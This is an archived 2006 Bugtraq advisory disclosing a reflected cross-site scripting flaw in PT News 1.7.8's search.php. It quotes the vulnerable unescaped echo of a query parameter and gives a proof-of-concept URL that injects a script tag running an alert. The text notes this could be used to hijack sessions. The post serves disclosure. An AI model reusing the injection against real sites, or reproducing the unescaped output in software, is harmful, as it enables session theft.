lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20060918190741.16172.qmail@securityfocus.com>
Date: 18 Sep 2006 19:07:41 -0000
From: Snake.Apollyon@...oo.com
To: bugtraq@...urityfocus.com
Subject: PT News 1.7.8 (Search.php) XSS Vulnerability

PT News 1.7.8 (Search.php) XSS Vulnerability
-----------------------------------------------------------
PT News
Version: 1.7.8
Website URL:http://www.openbg.net/ptsite/
-----------------------------------------------------------
Discoved by Snake 
[Unkn0wn Security Researcher]
The original article can be found at: http://unkn0wn.awardspace.com/security/articlZ.php
-----------------------------------------------------------
Un3ecure Digital Security Team
Gr33tZ t0 :Zer0c00l - Mr.2s - chester - 0.1 - Pc Er0r  - Street Shark
-----------------------------------------------------------
Vulnerable code is in Search.php 
in line 12 :
  <? echo $pgname; ?>
the varible no check input value and echo every code
-----------------------------------------------------------
Ex:
http://127.0.0.1/ptnews-1.7.8/search.php?pgname=<Script>alert('Snake was Here!!')</script>
You can execute your code and hijack Session.
-----------------------------------------------------------

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ